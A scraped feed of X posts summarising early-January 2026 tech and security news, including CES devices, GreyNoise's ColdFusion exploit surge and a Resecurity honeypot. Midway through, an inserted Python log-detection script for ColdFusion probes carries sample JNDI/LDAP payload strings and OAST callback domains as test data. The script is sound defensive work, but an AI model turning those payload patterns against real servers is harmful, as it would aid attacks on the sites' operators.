X Link 2026-01-03T23:51Z [--] followers, [--] engagements
"🚨 CES [----] Live Updates: Early TV, Smart-Glasses and Phone Announcements Start Rolling In ZDNet's live updates page previews CES [----] ahead of the January [--] show opening in Las Vegas, noting the week's pre-CES announcement surge and positioning TVs, smart glasses and phones as key battleground categories. It's a signal that major vendors (e.g. Samsung and LG) are front-loading launches and narrative-setting before the show floor opens. 🎯 Target: Global/Consumer Tech # Category: #CES2026 #TechNews #ConsumerElectronics #SmartGlasses #TVTech #MobileTech #AI 🔗 URL:"
X Link 2026-01-04T10:24Z [--] followers, [--] engagements
"🚨 GreyNoise Flags Holiday Surge: One Actor Drives Thousands of Adobe ColdFusion Exploit Attempts GreyNoise logged [----] malicious requests over Christmas [----] targeting 10+ Adobe ColdFusion CVEs (2023-2024), with 98% of traffic traced to two CTG Server Limited-hosted IPs using automated JNDI/LDAP-style probes plus Interactsh (OAST) callbacks. Activity peaked on Dec [--] and disproportionately hit servers in the US, Spain and India, making patch hygiene and holiday-period monitoring critical. 🎯 Target: Global/Web Apps (Adobe ColdFusion) US Spain India # Category: #AdobeColdFusion"
X Link 2026-01-04T13:52Z [--] followers, [--] engagements
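Both ColdFusion posts above describe the same scanning pattern: requests to ColdFusion endpoints carrying JNDI/LDAP lookup strings that point at Interactsh (OAST) callback hosts, concentrated on a couple of source IPs. The Python below is an added example of turning that description into a log check, not GreyNoise's tooling or any published signature. It parses Apache-style access lines, double-URL-decodes the request path (probes often arrive double-encoded), flags JNDI/LDAP lookups and OAST callback domains, and then reports how much of the probe traffic the top two sources account for. Assumptions: the Interactsh public domain list is the default set as I know it and should be refreshed from the project, the ColdFusion path patterns are generic, and the five log lines (RFC 5737 addresses) are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Assumption: default public Interactsh domains; refresh from the project before relying on it.
OAST_DOMAINS = ("oast.fun", "oast.live", "oast.site", "oast.online", "oast.pro", "oast.me", "interact.sh")
OAST_RE = re.compile(r"\b[a-z0-9]{8,}\.(?:" + "|".join(map(re.escape, OAST_DOMAINS)) + r")\b", re.I)
JNDI_RE = re.compile(r"(?:\$\{jndi:|ldaps?://|rmi://|dns://)", re.I)
CF_PATH_RE = re.compile(r"(?:/CFIDE/|/cf_scripts/|\.cf[cm]\b)", re.I)
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample: two probing sources, one double-encoded payload, two benign requests.
SAMPLE_LOG = [
    '203.0.113.10 - - [26/Dec/2025:03:14:07 +0000] "POST /CFIDE/administrator/index.cfm?x=%24%7Bjndi%3Aldap%3A%2F%2Fc1d2e3f4g5h6.oast.fun%2Fcf%7D HTTP/1.1" 500 312',
    '203.0.113.10 - - [26/Dec/2025:03:14:09 +0000] "GET /cf_scripts/scripts/ajax/package/cfajax.js?v=ldap%3A%2F%2Fc1d2e3f4g5h6.oast.live HTTP/1.1" 404 198',
    '203.0.113.11 - - [26/Dec/2025:03:15:40 +0000] "POST /CFIDE/administrator/login.cfm?u=%2524%257Bjndi%253Aldap%253A%252F%252Fa1b2c3d4e5f6g7h8.oast.pro%252F%257D HTTP/1.1" 200 845',
    '198.51.100.7 - - [26/Dec/2025:03:16:02 +0000] "GET /index.cfm?page=home HTTP/1.1" 200 5120',
    '198.51.100.8 - - [26/Dec/2025:03:16:30 +0000] "GET /static/app.js HTTP/1.1" 200 2210',
]


def classify(line: str):
    """Parse one access-log line and tag it; None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(unquote(m["path"]))  # two passes catch %25-double-encoded payloads
    reasons = []
    if CF_PATH_RE.search(path):
        reasons.append("coldfusion-endpoint")
    if JNDI_RE.search(path):
        reasons.append("jndi-lookup")
    if OAST_RE.search(path):
        reasons.append("oast-callback")
    # A ColdFusion path alone is context; a lookup or callback makes it a probe.
    probe = "jndi-lookup" in reasons or "oast-callback" in reasons
    return {"ip": m["ip"], "ts": m["ts"], "path": path, "reasons": reasons, "probe": probe}


def summarize(lines) -> dict:
    """Collect probes and measure how concentrated the sources are (top-2 share)."""
    flagged = []
    per_ip = Counter()
    for line in lines:
        rec = classify(line)
        if rec and rec["probe"]:
            flagged.append(rec)
            per_ip[rec["ip"]] += 1
    total = sum(per_ip.values())
    top2 = sum(count for _ip, count in per_ip.most_common(2))
    return {"flagged": flagged, "per_ip": dict(per_ip), "top2_share": top2 / total if total else 0.0}


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    for rec in s["flagged"]:
        print(rec["ip"], rec["reasons"], rec["path"])
    print("top-2 source share:", s["top2_share"])
```

An OAST callback string in a request is evidence of an attempt, not of success; the signal that a ColdFusion host actually resolved or connected to the callback domain lives in DNS and egress logs, so pair this check with an outbound lookup for the same `*.oast.*` names.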
"🚨 Venezuela Internet Disruptions Spike as NetBlocks Flags Caracas Outages and Tor Usage Surges NetBlocks reported connectivity losses in parts of Caracas tied to power cuts during a U.S. military operation, while public remarks suggested possible cyber/technical effects were used alongside kinetic action. Tor metrics reviewed in the report show a sharp spike in Venezuelan users, consistent with heightened surveillance fears, censorship risk and attempts to reach external information sources. 🎯 Target: Venezuela/Internet & Civil Society (Caracas) # Category: #Venezuela #InternetOutage #NetBlocks"
X Link 2026-01-04T16:57Z [--] followers, [--] engagements
"🚨 Resecurity Baits ShinyHunters/SLH With Decoy Accounts, Exposes OPSEC Mistakes Resecurity says actors linked to ShinyHunters / Scattered Lapsus$ Hunters attempted to target an employee but were funneled into a controlled honeypot account packed with realistic-looking yet inactionable data built from breached datasets and generated content. The firm claims the trap captured indicators like IPs/residential proxies and operational mistakes, underscoring how deception can turn breach claims into actionable attribution and detection intel. 🎯 Target: Global/Cybersecurity & Threat Intel # Category:"
X Link 2026-01-04T19:00Z [--] followers, [--] engagements
"🚨 Belkin ConnectAir Turns Any USB-C Device Into a Wireless HDMI Sender (No Wi-Fi Needed) Belkin's ConnectAir kit uses a USB-C transmitter and HDMI receiver to push 1080p/60 video over a direct 5GHz link up to [---] feet, with plug-and-play setup and support for quickly switching among multiple transmitters. It's positioned for conference rooms, classrooms and travel setups where casting protocols or managed Wi-Fi aren't reliable. 🎯 Target: Global/Enterprise AV & Consumers # Category: #CES2026 #Belkin #WirelessHDMI #DisplayTech #EnterpriseIT #AV #Productivity 🔗 URL:"
X Link 2026-01-04T22:03Z [--] followers, [--] engagements
"🚨 Xreal 1S Review: Real 3D Pushes Sub-$500 XR Glasses Into Serious Big-Screen Territory ZDNet's hands-on says the Xreal 1S delivers a notably more immersive portable display: 1200p optics, [---] nits, wider FoV and on-device Real 3D (2D-to-3D conversion) via the X1 chip, at around $449. This matters for hybrid work and travel: it's a personal private screen for productivity/gaming, but it also expands the attack surface (USB-C video accessories, companion apps and device trust) if used on unmanaged endpoints. 🎯 Target: Global/Consumers & Mobile Professionals # Category: #Xreal #Xreal1S #XR #ARGlasses"
X Link 2026-01-04T23:03Z [--] followers, [--] engagements
"🚨 DuRoBo Krono Brings Phone-Sized E-Ink + Open Android to CES [----] (A Focus Hub, Not a Kindle Clone) Krono is a 6.13" E Ink Carta [----] (300 PPI) pocketable device running open Android (with Play Store access) and a Smart Dial for quick actions like voice-note capture, plus built-in AI that transcribes/summarizes notes, turning it into a low-distraction reader + productivity companion. For security teams it's effectively an Android endpoint: treat it like any BYOD device (app permissions, account hygiene and network segmentation) if it enters enterprise workflows. 🎯 Target: Global/Consumers &"
X Link 2026-01-05T01:08Z [--] followers, [--] engagements
"🚨 SwitchBot Smart Home [---] Goes Big at CES [----] With Onero H1 Household Robot + 3D Face-Mapping Lock Vision SwitchBot unveiled its Onero H1 wheeled humanoid home robot (22 DOF) using an on-device vision-language-action system to manipulate objects and coordinate with existing SwitchBot devices, alongside the Lock Vision deadbolt that uses structured-light 3D facial mapping (and advanced biometrics on higher models) to reduce spoofing risk. The lineup signals a shift from single-purpose gadgets to an AI-orchestrated home ecosystem, raising both convenience and IoT/privacy governance stakes for"
X Link 2026-01-05T01:10Z [--] followers, [--] engagements
"🚨 SANS Stormcast (Jan [--] 2026): MongoBleed & React2Shell Watchlist, Crypto Scam TTPs, DNS Timing and Legacy Fortinet Risk The episode recaps ongoing MongoBleed and React2Shell exposure, highlights a classic advance-fee crypto scam luring victims with fake pending deposits, and shares practical DNS response-time troubleshooting using tshark. It also flags that thousands of Fortinet devices remain unpatched against a five-year-old CVE, underscoring persistent firmware/patch governance gaps. 🎯 Target: Global/IT & Security (DB, Network, Firewall Admins) # Category: #SANS #Stormcast #MongoBleed"
X Link 2026-01-05T02:49Z [--] followers, [--] engagements
"🚨 Resecurity Honeytrap Turns Attackers Into Intel: ShinyHunters Allegedly Duped by Synthetic Data Resecurity reports it lured a threat actor into a controlled AI-generated honeypot loaded with realistic-but-fake datasets, capturing tooling, proxy infrastructure and OPSEC slips during large-scale scraping attempts. A later update claims ShinyHunters also fell for the decoys, amplifying how deception can convert intrusion attempts into actionable IOCs/IOAs without exposing real production data. 🎯 Target: Global/Cybersecurity (Resecurity) # Category: #Honeypot #DeceptionTech #ThreatIntel"
X Link 2026-01-05T03:19Z [--] followers, [--] engagements